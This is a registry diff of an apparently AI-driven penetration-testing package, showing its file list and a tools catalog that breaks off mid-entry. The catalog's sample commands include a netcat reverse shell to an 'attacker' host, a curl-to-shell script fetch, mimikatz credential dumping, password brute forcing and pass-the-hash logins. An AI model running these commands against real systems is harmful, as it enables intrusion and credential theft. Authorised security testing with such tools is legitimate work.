aiptx 2.0.7__py3-none-any.whl
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- aipt_v2/__init__.py +110 -0
- aipt_v2/__main__.py +24 -0
- aipt_v2/agents/AIPTxAgent/__init__.py +10 -0
- aipt_v2/agents/AIPTxAgent/aiptx_agent.py +211 -0
- aipt_v2/agents/__init__.py +46 -0
- aipt_v2/agents/base.py +520 -0
- aipt_v2/agents/exploit_agent.py +688 -0
- aipt_v2/agents/ptt.py +406 -0
- aipt_v2/agents/state.py +168 -0
- aipt_v2/app.py +957 -0
- aipt_v2/browser/__init__.py +31 -0
- aipt_v2/browser/automation.py +458 -0
- aipt_v2/browser/crawler.py +453 -0
- aipt_v2/cli.py +2933 -0
- aipt_v2/compliance/__init__.py +71 -0
- aipt_v2/compliance/compliance_report.py +449 -0
- aipt_v2/compliance/framework_mapper.py +424 -0
- aipt_v2/compliance/nist_mapping.py +345 -0
- aipt_v2/compliance/owasp_mapping.py +330 -0
- aipt_v2/compliance/pci_mapping.py +297 -0
- aipt_v2/config.py +341 -0
- aipt_v2/core/__init__.py +43 -0
- aipt_v2/core/agent.py +630 -0
- aipt_v2/core/llm.py +395 -0
- aipt_v2/core/memory.py +305 -0
- aipt_v2/core/ptt.py +329 -0
- aipt_v2/database/__init__.py +14 -0
- aipt_v2/database/models.py +232 -0
- aipt_v2/database/repository.py +384 -0
- aipt_v2/docker/__init__.py +23 -0
- aipt_v2/docker/builder.py +260 -0
- aipt_v2/docker/manager.py +222 -0
- aipt_v2/docker/sandbox.py +371 -0
- aipt_v2/evasion/__init__.py +58 -0
- aipt_v2/evasion/request_obfuscator.py +272 -0
- aipt_v2/evasion/tls_fingerprint.py +285 -0
- aipt_v2/evasion/ua_rotator.py +301 -0
- aipt_v2/evasion/waf_bypass.py +439 -0
- aipt_v2/execution/__init__.py +23 -0
- aipt_v2/execution/executor.py +302 -0
- aipt_v2/execution/parser.py +544 -0
- aipt_v2/execution/terminal.py +337 -0
- aipt_v2/health.py +437 -0
- aipt_v2/intelligence/__init__.py +194 -0
- aipt_v2/intelligence/adaptation.py +474 -0
- aipt_v2/intelligence/auth.py +520 -0
- aipt_v2/intelligence/chaining.py +775 -0
- aipt_v2/intelligence/correlation.py +536 -0
- aipt_v2/intelligence/cve_aipt.py +334 -0
- aipt_v2/intelligence/cve_info.py +1111 -0
- aipt_v2/intelligence/knowledge_graph.py +590 -0
- aipt_v2/intelligence/learning.py +626 -0
- aipt_v2/intelligence/llm_analyzer.py +502 -0
- aipt_v2/intelligence/llm_tool_selector.py +518 -0
- aipt_v2/intelligence/payload_generator.py +562 -0
- aipt_v2/intelligence/rag.py +239 -0
- aipt_v2/intelligence/scope.py +442 -0
- aipt_v2/intelligence/searchers/__init__.py +5 -0
- aipt_v2/intelligence/searchers/exploitdb_searcher.py +523 -0
- aipt_v2/intelligence/searchers/github_searcher.py +467 -0
- aipt_v2/intelligence/searchers/google_searcher.py +281 -0
- aipt_v2/intelligence/tools.json +443 -0
- aipt_v2/intelligence/triage.py +670 -0
- aipt_v2/interactive_shell.py +559 -0
- aipt_v2/interface/__init__.py +5 -0
- aipt_v2/interface/cli.py +230 -0
- aipt_v2/interface/main.py +501 -0
- aipt_v2/interface/tui.py +1276 -0
- aipt_v2/interface/utils.py +583 -0
- aipt_v2/llm/__init__.py +39 -0
- aipt_v2/llm/config.py +26 -0
- aipt_v2/llm/llm.py +514 -0
- aipt_v2/llm/memory.py +214 -0
- aipt_v2/llm/request_queue.py +89 -0
- aipt_v2/llm/utils.py +89 -0
- aipt_v2/local_tool_installer.py +1467 -0
- aipt_v2/models/__init__.py +15 -0
- aipt_v2/models/findings.py +295 -0
- aipt_v2/models/phase_result.py +224 -0
- aipt_v2/models/scan_config.py +207 -0
- aipt_v2/monitoring/grafana/dashboards/aipt-dashboard.json +355 -0
- aipt_v2/monitoring/grafana/dashboards/default.yml +17 -0
- aipt_v2/monitoring/grafana/datasources/prometheus.yml +17 -0
- aipt_v2/monitoring/prometheus.yml +60 -0
- aipt_v2/orchestration/__init__.py +52 -0
- aipt_v2/orchestration/pipeline.py +398 -0
- aipt_v2/orchestration/progress.py +300 -0
- aipt_v2/orchestration/scheduler.py +296 -0
- aipt_v2/orchestrator.py +2427 -0
- aipt_v2/payloads/__init__.py +27 -0
- aipt_v2/payloads/cmdi.py +150 -0
- aipt_v2/payloads/sqli.py +263 -0
- aipt_v2/payloads/ssrf.py +204 -0
- aipt_v2/payloads/templates.py +222 -0
- aipt_v2/payloads/traversal.py +166 -0
- aipt_v2/payloads/xss.py +204 -0
- aipt_v2/prompts/__init__.py +60 -0
- aipt_v2/proxy/__init__.py +29 -0
- aipt_v2/proxy/history.py +352 -0
- aipt_v2/proxy/interceptor.py +452 -0
- aipt_v2/recon/__init__.py +44 -0
- aipt_v2/recon/dns.py +241 -0
- aipt_v2/recon/osint.py +367 -0
- aipt_v2/recon/subdomain.py +372 -0
- aipt_v2/recon/tech_detect.py +311 -0
- aipt_v2/reports/__init__.py +17 -0
- aipt_v2/reports/generator.py +313 -0
- aipt_v2/reports/html_report.py +378 -0
- aipt_v2/runtime/__init__.py +53 -0
- aipt_v2/runtime/base.py +30 -0
- aipt_v2/runtime/docker.py +401 -0
- aipt_v2/runtime/local.py +346 -0
- aipt_v2/runtime/tool_server.py +205 -0
- aipt_v2/runtime/vps.py +830 -0
- aipt_v2/scanners/__init__.py +28 -0
- aipt_v2/scanners/base.py +273 -0
- aipt_v2/scanners/nikto.py +244 -0
- aipt_v2/scanners/nmap.py +402 -0
- aipt_v2/scanners/nuclei.py +273 -0
- aipt_v2/scanners/web.py +454 -0
- aipt_v2/scripts/security_audit.py +366 -0
- aipt_v2/setup_wizard.py +941 -0
- aipt_v2/skills/__init__.py +80 -0
- aipt_v2/skills/agents/__init__.py +14 -0
- aipt_v2/skills/agents/api_tester.py +706 -0
- aipt_v2/skills/agents/base.py +477 -0
- aipt_v2/skills/agents/code_review.py +459 -0
- aipt_v2/skills/agents/security_agent.py +336 -0
- aipt_v2/skills/agents/web_pentest.py +818 -0
- aipt_v2/skills/prompts/__init__.py +647 -0
- aipt_v2/system_detector.py +539 -0
- aipt_v2/telemetry/__init__.py +7 -0
- aipt_v2/telemetry/tracer.py +347 -0
- aipt_v2/terminal/__init__.py +28 -0
- aipt_v2/terminal/executor.py +400 -0
- aipt_v2/terminal/sandbox.py +350 -0
- aipt_v2/tools/__init__.py +44 -0
- aipt_v2/tools/active_directory/__init__.py +78 -0
- aipt_v2/tools/active_directory/ad_config.py +238 -0
- aipt_v2/tools/active_directory/bloodhound_wrapper.py +447 -0
- aipt_v2/tools/active_directory/kerberos_attacks.py +430 -0
- aipt_v2/tools/active_directory/ldap_enum.py +533 -0
- aipt_v2/tools/active_directory/smb_attacks.py +505 -0
- aipt_v2/tools/agents_graph/__init__.py +19 -0
- aipt_v2/tools/agents_graph/agents_graph_actions.py +69 -0
- aipt_v2/tools/api_security/__init__.py +76 -0
- aipt_v2/tools/api_security/api_discovery.py +608 -0
- aipt_v2/tools/api_security/graphql_scanner.py +622 -0
- aipt_v2/tools/api_security/jwt_analyzer.py +577 -0
- aipt_v2/tools/api_security/openapi_fuzzer.py +761 -0
- aipt_v2/tools/browser/__init__.py +5 -0
- aipt_v2/tools/browser/browser_actions.py +238 -0
- aipt_v2/tools/browser/browser_instance.py +535 -0
- aipt_v2/tools/browser/tab_manager.py +344 -0
- aipt_v2/tools/cloud/__init__.py +70 -0
- aipt_v2/tools/cloud/cloud_config.py +273 -0
- aipt_v2/tools/cloud/cloud_scanner.py +639 -0
- aipt_v2/tools/cloud/prowler_tool.py +571 -0
- aipt_v2/tools/cloud/scoutsuite_tool.py +359 -0
- aipt_v2/tools/executor.py +307 -0
- aipt_v2/tools/parser.py +408 -0
- aipt_v2/tools/proxy/__init__.py +5 -0
- aipt_v2/tools/proxy/proxy_actions.py +103 -0
- aipt_v2/tools/proxy/proxy_manager.py +789 -0
- aipt_v2/tools/registry.py +196 -0
- aipt_v2/tools/scanners/__init__.py +343 -0
- aipt_v2/tools/scanners/acunetix_tool.py +712 -0
- aipt_v2/tools/scanners/burp_tool.py +631 -0
- aipt_v2/tools/scanners/config.py +156 -0
- aipt_v2/tools/scanners/nessus_tool.py +588 -0
- aipt_v2/tools/scanners/zap_tool.py +612 -0
- aipt_v2/tools/terminal/__init__.py +5 -0
- aipt_v2/tools/terminal/terminal_actions.py +37 -0
- aipt_v2/tools/terminal/terminal_manager.py +153 -0
- aipt_v2/tools/terminal/terminal_session.py +449 -0
- aipt_v2/tools/tool_processing.py +108 -0
- aipt_v2/utils/__init__.py +17 -0
- aipt_v2/utils/logging.py +202 -0
- aipt_v2/utils/model_manager.py +187 -0
- aipt_v2/utils/searchers/__init__.py +269 -0
- aipt_v2/verify_install.py +793 -0
- aiptx-2.0.7.dist-info/METADATA +345 -0
- aiptx-2.0.7.dist-info/RECORD +187 -0
- aiptx-2.0.7.dist-info/WHEEL +5 -0
- aiptx-2.0.7.dist-info/entry_points.txt +7 -0
- aiptx-2.0.7.dist-info/licenses/LICENSE +21 -0
- aiptx-2.0.7.dist-info/top_level.txt +1 -0
|
@@ -0,0 +1,443 @@
|
|
|
1
|
+
[
|
|
2
|
+
{
|
|
3
|
+
"name": "nmap",
|
|
4
|
+
"description": "Network exploration and security auditing tool. Discovers hosts, open ports, services, and OS detection.",
|
|
5
|
+
"cmd": "nmap -sV -sC -oN nmap_scan.txt {target}",
|
|
6
|
+
"keywords": ["port", "scan", "service", "network", "discovery", "host", "tcp", "udp"],
|
|
7
|
+
"samples": ["nmap -sV 192.168.1.1", "nmap -p- --min-rate=1000 target.com", "nmap -sU -sV 10.0.0.1"],
|
|
8
|
+
"phase": "recon",
|
|
9
|
+
"timeout": 600
|
|
10
|
+
},
|
|
11
|
+
{
|
|
12
|
+
"name": "masscan",
|
|
13
|
+
"description": "Fast TCP port scanner. Scans entire internet in minutes. Best for large network ranges.",
|
|
14
|
+
"cmd": "masscan {target} -p1-65535 --rate=1000 -oL masscan_results.txt",
|
|
15
|
+
"keywords": ["fast", "port", "scan", "mass", "range", "tcp"],
|
|
16
|
+
"samples": ["masscan 10.0.0.0/8 -p80,443", "masscan 192.168.1.0/24 --rate=10000"],
|
|
17
|
+
"phase": "recon",
|
|
18
|
+
"timeout": 300
|
|
19
|
+
},
|
|
20
|
+
{
|
|
21
|
+
"name": "subfinder",
|
|
22
|
+
"description": "Subdomain discovery tool. Finds subdomains using passive sources like DNS, certificates.",
|
|
23
|
+
"cmd": "subfinder -d {target} -o subdomains.txt",
|
|
24
|
+
"keywords": ["subdomain", "dns", "domain", "discovery", "passive", "enumeration"],
|
|
25
|
+
"samples": ["subfinder -d example.com", "subfinder -d target.com -all"],
|
|
26
|
+
"phase": "recon",
|
|
27
|
+
"timeout": 300
|
|
28
|
+
},
|
|
29
|
+
{
|
|
30
|
+
"name": "httpx",
|
|
31
|
+
"description": "Fast HTTP toolkit. Probes for web servers, extracts titles, status codes, tech stack.",
|
|
32
|
+
"cmd": "httpx -l {target} -status-code -title -tech-detect -o httpx_results.txt",
|
|
33
|
+
"keywords": ["http", "web", "probe", "status", "title", "technology"],
|
|
34
|
+
"samples": ["cat domains.txt | httpx -status-code", "httpx -u https://target.com -tech-detect"],
|
|
35
|
+
"phase": "recon",
|
|
36
|
+
"timeout": 300
|
|
37
|
+
},
|
|
38
|
+
{
|
|
39
|
+
"name": "whatweb",
|
|
40
|
+
"description": "Web fingerprinting tool. Identifies CMS, frameworks, server software, and plugins.",
|
|
41
|
+
"cmd": "whatweb -v {target}",
|
|
42
|
+
"keywords": ["fingerprint", "cms", "technology", "wordpress", "framework", "web"],
|
|
43
|
+
"samples": ["whatweb https://target.com", "whatweb -a 3 target.com"],
|
|
44
|
+
"phase": "recon",
|
|
45
|
+
"timeout": 120
|
|
46
|
+
},
|
|
47
|
+
{
|
|
48
|
+
"name": "amass",
|
|
49
|
+
"description": "In-depth attack surface mapping and asset discovery. Subdomain enum with multiple sources.",
|
|
50
|
+
"cmd": "amass enum -d {target} -o amass_results.txt",
|
|
51
|
+
"keywords": ["subdomain", "asset", "discovery", "dns", "attack surface"],
|
|
52
|
+
"samples": ["amass enum -d example.com", "amass enum -brute -d target.com"],
|
|
53
|
+
"phase": "recon",
|
|
54
|
+
"timeout": 600
|
|
55
|
+
},
|
|
56
|
+
{
|
|
57
|
+
"name": "theHarvester",
|
|
58
|
+
"description": "Gather emails, names, subdomains, IPs from public sources. OSINT tool.",
|
|
59
|
+
"cmd": "theHarvester -d {target} -b all",
|
|
60
|
+
"keywords": ["email", "osint", "harvest", "names", "linkedin", "google"],
|
|
61
|
+
"samples": ["theHarvester -d company.com -b google", "theHarvester -d target.com -b linkedin"],
|
|
62
|
+
"phase": "recon",
|
|
63
|
+
"timeout": 300
|
|
64
|
+
},
|
|
65
|
+
{
|
|
66
|
+
"name": "dnsrecon",
|
|
67
|
+
"description": "DNS enumeration tool. Zone transfers, brute force, cache snooping.",
|
|
68
|
+
"cmd": "dnsrecon -d {target}",
|
|
69
|
+
"keywords": ["dns", "zone transfer", "enumeration", "records", "mx", "ns"],
|
|
70
|
+
"samples": ["dnsrecon -d example.com -t axfr", "dnsrecon -d target.com -t brt"],
|
|
71
|
+
"phase": "recon",
|
|
72
|
+
"timeout": 180
|
|
73
|
+
},
|
|
74
|
+
{
|
|
75
|
+
"name": "shodan",
|
|
76
|
+
"description": "Search engine for internet-connected devices. Find exposed services and vulnerabilities.",
|
|
77
|
+
"cmd": "shodan search hostname:{target}",
|
|
78
|
+
"keywords": ["shodan", "iot", "exposed", "internet", "devices", "search"],
|
|
79
|
+
"samples": ["shodan host 1.2.3.4", "shodan search 'apache port:80'"],
|
|
80
|
+
"phase": "recon",
|
|
81
|
+
"timeout": 60
|
|
82
|
+
},
|
|
83
|
+
{
|
|
84
|
+
"name": "wafw00f",
|
|
85
|
+
"description": "Web Application Firewall detection tool. Identifies WAF/IPS protecting targets.",
|
|
86
|
+
"cmd": "wafw00f {target}",
|
|
87
|
+
"keywords": ["waf", "firewall", "detection", "bypass", "protection"],
|
|
88
|
+
"samples": ["wafw00f https://target.com", "wafw00f -a target.com"],
|
|
89
|
+
"phase": "recon",
|
|
90
|
+
"timeout": 60
|
|
91
|
+
},
|
|
92
|
+
{
|
|
93
|
+
"name": "gobuster",
|
|
94
|
+
"description": "Directory and file brute-forcing tool. Discovers hidden paths and files on web servers.",
|
|
95
|
+
"cmd": "gobuster dir -u {target} -w /usr/share/wordlists/dirb/common.txt -o gobuster_results.txt",
|
|
96
|
+
"keywords": ["directory", "brute", "fuzz", "path", "files", "hidden", "web"],
|
|
97
|
+
"samples": ["gobuster dir -u http://target.com -w wordlist.txt", "gobuster dns -d example.com -w subdomains.txt"],
|
|
98
|
+
"phase": "enum",
|
|
99
|
+
"timeout": 600
|
|
100
|
+
},
|
|
101
|
+
{
|
|
102
|
+
"name": "ffuf",
|
|
103
|
+
"description": "Fast web fuzzer. Directory discovery, parameter fuzzing, virtual host enumeration.",
|
|
104
|
+
"cmd": "ffuf -u {target}/FUZZ -w /usr/share/wordlists/dirb/common.txt -o ffuf_results.json -of json",
|
|
105
|
+
"keywords": ["fuzz", "directory", "parameter", "brute", "web", "vhost"],
|
|
106
|
+
"samples": ["ffuf -u http://target.com/FUZZ -w wordlist.txt", "ffuf -u http://target.com?id=FUZZ -w numbers.txt"],
|
|
107
|
+
"phase": "enum",
|
|
108
|
+
"timeout": 600
|
|
109
|
+
},
|
|
110
|
+
{
|
|
111
|
+
"name": "nikto",
|
|
112
|
+
"description": "Web server vulnerability scanner. Checks for dangerous files, outdated software, misconfigs.",
|
|
113
|
+
"cmd": "nikto -h {target} -o nikto_results.txt",
|
|
114
|
+
"keywords": ["vulnerability", "web", "scanner", "misconfig", "cgi", "outdated"],
|
|
115
|
+
"samples": ["nikto -h http://target.com", "nikto -h target.com -p 8080"],
|
|
116
|
+
"phase": "enum",
|
|
117
|
+
"timeout": 600
|
|
118
|
+
},
|
|
119
|
+
{
|
|
120
|
+
"name": "nuclei",
|
|
121
|
+
"description": "Fast vulnerability scanner using templates. CVE detection, misconfigs, exposures.",
|
|
122
|
+
"cmd": "nuclei -u {target} -t cves/ -o nuclei_results.txt",
|
|
123
|
+
"keywords": ["cve", "vulnerability", "template", "scanner", "nuclei", "exploit"],
|
|
124
|
+
"samples": ["nuclei -u https://target.com -t cves/", "nuclei -l urls.txt -t misconfiguration/"],
|
|
125
|
+
"phase": "enum",
|
|
126
|
+
"timeout": 600
|
|
127
|
+
},
|
|
128
|
+
{
|
|
129
|
+
"name": "enum4linux",
|
|
130
|
+
"description": "Windows/Samba enumeration tool. Users, shares, groups, password policy.",
|
|
131
|
+
"cmd": "enum4linux -a {target}",
|
|
132
|
+
"keywords": ["smb", "windows", "shares", "users", "samba", "netbios", "enum"],
|
|
133
|
+
"samples": ["enum4linux -a 192.168.1.10", "enum4linux -U -S target"],
|
|
134
|
+
"phase": "enum",
|
|
135
|
+
"timeout": 300
|
|
136
|
+
},
|
|
137
|
+
{
|
|
138
|
+
"name": "smbclient",
|
|
139
|
+
"description": "SMB/CIFS client. List and access Windows shares.",
|
|
140
|
+
"cmd": "smbclient -L //{target} -N",
|
|
141
|
+
"keywords": ["smb", "shares", "windows", "cifs", "files"],
|
|
142
|
+
"samples": ["smbclient -L //192.168.1.10 -N", "smbclient //target/share -U user"],
|
|
143
|
+
"phase": "enum",
|
|
144
|
+
"timeout": 60
|
|
145
|
+
},
|
|
146
|
+
{
|
|
147
|
+
"name": "ldapsearch",
|
|
148
|
+
"description": "LDAP enumeration. Query Active Directory for users, groups, computers.",
|
|
149
|
+
"cmd": "ldapsearch -x -H ldap://{target} -b 'dc=domain,dc=com'",
|
|
150
|
+
"keywords": ["ldap", "active directory", "users", "groups", "ad", "domain"],
|
|
151
|
+
"samples": ["ldapsearch -x -H ldap://dc.target.com -b 'dc=target,dc=com'"],
|
|
152
|
+
"phase": "enum",
|
|
153
|
+
"timeout": 120
|
|
154
|
+
},
|
|
155
|
+
{
|
|
156
|
+
"name": "rpcclient",
|
|
157
|
+
"description": "RPC client for Windows. Enumerate users, groups, shares via RPC.",
|
|
158
|
+
"cmd": "rpcclient -U '' -N {target}",
|
|
159
|
+
"keywords": ["rpc", "windows", "users", "enumeration", "null session"],
|
|
160
|
+
"samples": ["rpcclient -U '' -N 192.168.1.10 -c 'enumdomusers'"],
|
|
161
|
+
"phase": "enum",
|
|
162
|
+
"timeout": 60
|
|
163
|
+
},
|
|
164
|
+
{
|
|
165
|
+
"name": "snmpwalk",
|
|
166
|
+
"description": "SNMP enumeration tool. Walk MIB tree to discover system information.",
|
|
167
|
+
"cmd": "snmpwalk -v2c -c public {target}",
|
|
168
|
+
"keywords": ["snmp", "mib", "community", "network", "enumeration"],
|
|
169
|
+
"samples": ["snmpwalk -v2c -c public 192.168.1.1", "snmpwalk -v3 target"],
|
|
170
|
+
"phase": "enum",
|
|
171
|
+
"timeout": 180
|
|
172
|
+
},
|
|
173
|
+
{
|
|
174
|
+
"name": "wpscan",
|
|
175
|
+
"description": "WordPress vulnerability scanner. Plugins, themes, users, vulnerabilities.",
|
|
176
|
+
"cmd": "wpscan --url {target} --enumerate vp,vt,u",
|
|
177
|
+
"keywords": ["wordpress", "cms", "plugin", "vulnerability", "wp"],
|
|
178
|
+
"samples": ["wpscan --url https://target.com", "wpscan --url target.com --api-token TOKEN"],
|
|
179
|
+
"phase": "enum",
|
|
180
|
+
"timeout": 300
|
|
181
|
+
},
|
|
182
|
+
{
|
|
183
|
+
"name": "sqlmap",
|
|
184
|
+
"description": "Automatic SQL injection tool. Detects and exploits SQL injection vulnerabilities.",
|
|
185
|
+
"cmd": "sqlmap -u '{target}' --batch --dbs",
|
|
186
|
+
"keywords": ["sql", "injection", "database", "sqli", "exploit", "dump"],
|
|
187
|
+
"samples": ["sqlmap -u 'http://target.com?id=1' --dbs", "sqlmap -r request.txt --dump"],
|
|
188
|
+
"phase": "exploit",
|
|
189
|
+
"timeout": 600
|
|
190
|
+
},
|
|
191
|
+
{
|
|
192
|
+
"name": "hydra",
|
|
193
|
+
"description": "Password brute-forcing tool. Supports SSH, FTP, HTTP, SMB, and many protocols.",
|
|
194
|
+
"cmd": "hydra -L users.txt -P passwords.txt {target} ssh",
|
|
195
|
+
"keywords": ["brute", "password", "login", "ssh", "ftp", "http", "crack"],
|
|
196
|
+
"samples": ["hydra -l admin -P rockyou.txt ssh://target", "hydra -L users.txt -P pass.txt target http-post-form"],
|
|
197
|
+
"phase": "exploit",
|
|
198
|
+
"timeout": 600
|
|
199
|
+
},
|
|
200
|
+
{
|
|
201
|
+
"name": "metasploit",
|
|
202
|
+
"description": "Exploitation framework. Thousands of exploits, payloads, post-exploitation modules.",
|
|
203
|
+
"cmd": "msfconsole -q -x 'search {target}; exit'",
|
|
204
|
+
"keywords": ["exploit", "payload", "shell", "meterpreter", "msf", "reverse"],
|
|
205
|
+
"samples": ["msfconsole -x 'use exploit/windows/smb/ms17_010_eternalblue'", "msfvenom -p windows/meterpreter/reverse_tcp"],
|
|
206
|
+
"phase": "exploit",
|
|
207
|
+
"timeout": 300
|
|
208
|
+
},
|
|
209
|
+
{
|
|
210
|
+
"name": "searchsploit",
|
|
211
|
+
"description": "Exploit-DB search tool. Find public exploits for known vulnerabilities.",
|
|
212
|
+
"cmd": "searchsploit {target}",
|
|
213
|
+
"keywords": ["exploit", "exploitdb", "cve", "search", "poc"],
|
|
214
|
+
"samples": ["searchsploit apache 2.4", "searchsploit -m 12345"],
|
|
215
|
+
"phase": "exploit",
|
|
216
|
+
"timeout": 30
|
|
217
|
+
},
|
|
218
|
+
{
|
|
219
|
+
"name": "crackmapexec",
|
|
220
|
+
"description": "Swiss army knife for Windows/AD. SMB, WinRM, MSSQL exploitation.",
|
|
221
|
+
"cmd": "crackmapexec smb {target} -u user -p password",
|
|
222
|
+
"keywords": ["smb", "windows", "ad", "lateral", "cme", "winrm", "pass the hash"],
|
|
223
|
+
"samples": ["cme smb 192.168.1.0/24 -u admin -p password", "cme smb target -u user -H hash"],
|
|
224
|
+
"phase": "exploit",
|
|
225
|
+
"timeout": 300
|
|
226
|
+
},
|
|
227
|
+
{
|
|
228
|
+
"name": "impacket-psexec",
|
|
229
|
+
"description": "Remote command execution on Windows via SMB. Requires valid credentials.",
|
|
230
|
+
"cmd": "impacket-psexec {target} -hashes :HASH",
|
|
231
|
+
"keywords": ["psexec", "windows", "remote", "smb", "admin", "shell"],
|
|
232
|
+
"samples": ["psexec.py domain/user:password@target", "psexec.py -hashes :hash user@target"],
|
|
233
|
+
"phase": "exploit",
|
|
234
|
+
"timeout": 120
|
|
235
|
+
},
|
|
236
|
+
{
|
|
237
|
+
"name": "evil-winrm",
|
|
238
|
+
"description": "WinRM shell. Remote PowerShell access to Windows targets.",
|
|
239
|
+
"cmd": "evil-winrm -i {target} -u user -p password",
|
|
240
|
+
"keywords": ["winrm", "powershell", "windows", "shell", "remote"],
|
|
241
|
+
"samples": ["evil-winrm -i 192.168.1.10 -u admin -p pass", "evil-winrm -i target -u user -H hash"],
|
|
242
|
+
"phase": "exploit",
|
|
243
|
+
"timeout": 120
|
|
244
|
+
},
|
|
245
|
+
{
|
|
246
|
+
"name": "john",
|
|
247
|
+
"description": "Password cracker. Cracks hashes from various formats.",
|
|
248
|
+
"cmd": "john --wordlist=/usr/share/wordlists/rockyou.txt {target}",
|
|
249
|
+
"keywords": ["crack", "hash", "password", "brute", "john"],
|
|
250
|
+
"samples": ["john --format=raw-md5 hashes.txt", "john --wordlist=rockyou.txt shadow"],
|
|
251
|
+
"phase": "exploit",
|
|
252
|
+
"timeout": 600
|
|
253
|
+
},
|
|
254
|
+
{
|
|
255
|
+
"name": "hashcat",
|
|
256
|
+
"description": "Advanced GPU-based password cracker. Fastest hash cracking tool.",
|
|
257
|
+
"cmd": "hashcat -m 0 {target} /usr/share/wordlists/rockyou.txt",
|
|
258
|
+
"keywords": ["crack", "hash", "gpu", "password", "brute"],
|
|
259
|
+
"samples": ["hashcat -m 1000 hashes.txt rockyou.txt", "hashcat -m 500 -a 3 hashes.txt ?a?a?a?a"],
|
|
260
|
+
"phase": "exploit",
|
|
261
|
+
"timeout": 600
|
|
262
|
+
},
|
|
263
|
+
{
|
|
264
|
+
"name": "responder",
|
|
265
|
+
"description": "LLMNR/NBT-NS/MDNS poisoner. Capture NTLMv2 hashes on the network.",
|
|
266
|
+
"cmd": "responder -I eth0 -wrf",
|
|
267
|
+
"keywords": ["llmnr", "nbns", "poison", "ntlm", "hash", "mitm"],
|
|
268
|
+
"samples": ["responder -I eth0", "responder -I eth0 -wrf"],
|
|
269
|
+
"phase": "exploit",
|
|
270
|
+
"timeout": 600
|
|
271
|
+
},
|
|
272
|
+
{
|
|
273
|
+
"name": "commix",
|
|
274
|
+
"description": "Command injection exploitation tool. Detects and exploits command injection.",
|
|
275
|
+
"cmd": "commix -u '{target}'",
|
|
276
|
+
"keywords": ["command", "injection", "rce", "os", "shell"],
|
|
277
|
+
"samples": ["commix -u 'http://target.com?cmd=id'", "commix --url=target --data='input=test'"],
|
|
278
|
+
"phase": "exploit",
|
|
279
|
+
"timeout": 300
|
|
280
|
+
},
|
|
281
|
+
{
|
|
282
|
+
"name": "xsstrike",
|
|
283
|
+
"description": "Advanced XSS detection and exploitation tool.",
|
|
284
|
+
"cmd": "xsstrike -u '{target}'",
|
|
285
|
+
"keywords": ["xss", "cross-site", "scripting", "web", "injection"],
|
|
286
|
+
"samples": ["xsstrike -u 'http://target.com?q=test'", "xsstrike --crawl -u target.com"],
|
|
287
|
+
"phase": "exploit",
|
|
288
|
+
"timeout": 300
|
|
289
|
+
},
|
|
290
|
+
{
|
|
291
|
+
"name": "burpsuite",
|
|
292
|
+
"description": "Web application security testing platform. Proxy, scanner, intruder.",
|
|
293
|
+
"cmd": "burpsuite",
|
|
294
|
+
"keywords": ["web", "proxy", "scanner", "intercept", "burp"],
|
|
295
|
+
"samples": ["Launch Burp Suite and configure browser proxy"],
|
|
296
|
+
"phase": "exploit",
|
|
297
|
+
"timeout": 0
|
|
298
|
+
},
|
|
299
|
+
{
|
|
300
|
+
"name": "netcat",
|
|
301
|
+
"description": "Network utility for connections. Reverse shells, port scanning, file transfer.",
|
|
302
|
+
"cmd": "nc -lvnp 4444",
|
|
303
|
+
"keywords": ["netcat", "nc", "reverse", "shell", "listen", "connect"],
|
|
304
|
+
"samples": ["nc -lvnp 4444", "nc target 80", "nc -e /bin/bash attacker 4444"],
|
|
305
|
+
"phase": "exploit",
|
|
306
|
+
"timeout": 600
|
|
307
|
+
},
|
|
308
|
+
{
|
|
309
|
+
"name": "chisel",
|
|
310
|
+
"description": "TCP/UDP tunnel over HTTP. Bypass firewalls, pivot through networks.",
|
|
311
|
+
"cmd": "chisel server -p 8080 --reverse",
|
|
312
|
+
"keywords": ["tunnel", "pivot", "proxy", "firewall", "bypass"],
|
|
313
|
+
"samples": ["chisel server -p 8080 --reverse", "chisel client server:8080 R:socks"],
|
|
314
|
+
"phase": "exploit",
|
|
315
|
+
"timeout": 600
|
|
316
|
+
},
|
|
317
|
+
{
|
|
318
|
+
"name": "linpeas",
|
|
319
|
+
"description": "Linux privilege escalation checker. Finds misconfigs, SUID, creds, paths to root.",
|
|
320
|
+
"cmd": "curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh",
|
|
321
|
+
"keywords": ["privesc", "linux", "suid", "root", "escalation", "enumeration"],
|
|
322
|
+
"samples": ["./linpeas.sh", "curl linpeas.sh | sh"],
|
|
323
|
+
"phase": "post",
|
|
324
|
+
"timeout": 300
|
|
325
|
+
},
|
|
326
|
+
{
|
|
327
|
+
"name": "winpeas",
|
|
328
|
+
"description": "Windows privilege escalation checker. Services, tokens, creds, paths to SYSTEM.",
|
|
329
|
+
"cmd": "winpeas.exe",
|
|
330
|
+
"keywords": ["privesc", "windows", "system", "escalation", "enumeration"],
|
|
331
|
+
"samples": ["winpeas.exe", "winpeas.exe quiet"],
|
|
332
|
+
"phase": "post",
|
|
333
|
+
"timeout": 300
|
|
334
|
+
},
|
|
335
|
+
{
|
|
336
|
+
"name": "pspy",
|
|
337
|
+
"description": "Linux process monitor without root. Detect cron jobs, scheduled tasks.",
|
|
338
|
+
"cmd": "./pspy64",
|
|
339
|
+
"keywords": ["process", "cron", "monitor", "linux", "privesc"],
|
|
340
|
+
"samples": ["./pspy64", "./pspy32 -pf -i 1000"],
|
|
341
|
+
"phase": "post",
|
|
342
|
+
"timeout": 300
|
|
343
|
+
},
|
|
344
|
+
{
|
|
345
|
+
"name": "mimikatz",
|
|
346
|
+
"description": "Windows credential extraction. Dump passwords, hashes, Kerberos tickets.",
|
|
347
|
+
"cmd": "mimikatz.exe 'privilege::debug' 'sekurlsa::logonpasswords' 'exit'",
|
|
348
|
+
"keywords": ["credential", "dump", "password", "hash", "kerberos", "windows"],
|
|
349
|
+
"samples": ["mimikatz 'sekurlsa::logonpasswords'", "mimikatz 'lsadump::sam'"],
|
|
350
|
+
"phase": "post",
|
|
351
|
+
"timeout": 60
|
|
352
|
+
},
|
|
353
|
+
{
|
|
354
|
+
"name": "bloodhound",
|
|
355
|
+
"description": "Active Directory attack path finder. Visualize paths to Domain Admin.",
|
|
356
|
+
"cmd": "bloodhound-python -u user -p password -d domain.com -c all",
|
|
357
|
+
"keywords": ["active directory", "ad", "bloodhound", "domain", "attack path"],
|
|
358
|
+
"samples": ["bloodhound-python -c all -d domain.com", "SharpHound.exe -c all"],
|
|
359
|
+
"phase": "post",
|
|
360
